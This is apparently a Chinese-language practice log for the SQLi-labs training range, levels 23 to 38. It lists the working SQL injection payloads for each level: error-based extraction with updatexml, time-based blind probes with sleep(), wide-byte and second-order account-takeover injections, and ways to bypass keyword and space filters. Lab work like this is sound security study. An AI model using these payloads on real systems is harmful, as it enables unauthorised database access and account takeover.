靶场练习-SQLilabs-Adv

less-23：需要绕过注释符，本来我的想法是用16进制或者asc码甚至数值10进制转字符方式的，但都失败了，不知道是不是打开方式不对，这里求大佬指点；最后从网上找到资料https://www.xjx100.cn/news/160117.html?action=onClick，使用1‘ or ’1‘=’1闭合引号方式绕过；按照这个闭合最终引号思路，使用1’ or updatexml(1,concat(0x7e,(database()),0x7e),0) or ‘1‘=’1来报错显示
less-24：主页面是登录，点击忘记密码让自己先办法，还有个注册页面，注册已有账户会有对应提示；尝试早用户名后面加单引号看会不会报错，结果没报错，注册成功了；于是用已有账户Dumb’–注册一个空密码账户，接着用Dumb‘与密码就能登录了Dump账户
less-25：从头开始1’–正常回显；and和or都被过滤了，还好||没被过滤，使用’|| 1=1–+可以继续注入
less-25a：通过使用999%20||%201=2–+与999%20||%201=1–+看到不同回显，可以判断存在注入点
less-26：好像空格注释被过滤了，and和or可以复写绕过不过想了很久，还是决定使用不用空格不用注释的方法1’||updatexml(1,concat(0x7e,(database()),0x7e),0)||’
less-26a：还按照上一道题来，结果没有报错输出；嗯。。。随机删几个字符，不报错；使用sleep试试继续用（）代替空格，1’)and(if(length(database())=0,NULL,sleep(10)))and(‘1’=‘1可以
less-27：继续按照上一道题来，结果报错了，才发现实际正常情况下1’and(if(length(database())=0,NULL,sleep(10)))and‘1’=‘1两端有引号的部分是不用带括号的。。。
less-27a：跟上一道题类似，单引号变成双引号1"and(if(length(database())=0,NULL,sleep(10)))and"1"="1
less-28：1’and’1’=‘1和1’and’1’=‘2有不同回显，1’and(if(length(database())=0,NULL,sleep(10)))and‘1’=‘1这个继续可以过，但是时间很长，改成0.1，发现居然被拉伸成了25倍，不知道哪位大佬能帮助解惑。。。
less-28a：同上
less-29：1’ and 1=1 --+和1’ and 1=2 --+有不同的回显，1‘ and if(length(database())=0,NULL,sleep(10))–+可以
less-30：按照上一道题答的案1" and if(length(database())=8,NULL,sleep(10))–+数据库长度8位
less-31：按照上一题，1" and if(length(database())=9,NULL,sleep(10))–+会报错，从头来，发现需要加一个括号，然后在上一道题答案中加上括号1") and if(length(database())=9,NULL,sleep(10))–+就可以了
less-32：宽字节注入，運‘ or 1=1 --+和運’ or 1=2 --+有不同回显
less-33：同上
less-34：抓包，運’or 1=2–+和運’or 1=1–+回显不同
less-35：999 union select 1,2,3开始的时候一直报错，后来想想可能是一直做字符型，现在换成数值型不习惯了
less-36：運‘ and 1=1–+和運‘ and 1=2–+回显不同，可以配合sleep（）
less-37：抓包uname=Dumb運’ or if(length(database())=9,NULL,sleep(1))可以
less-38：1’ and if(length(database())=9,NULL,sleep(5))–+可以过；不过看了资料才知道，这关是可以多语句堆叠执行的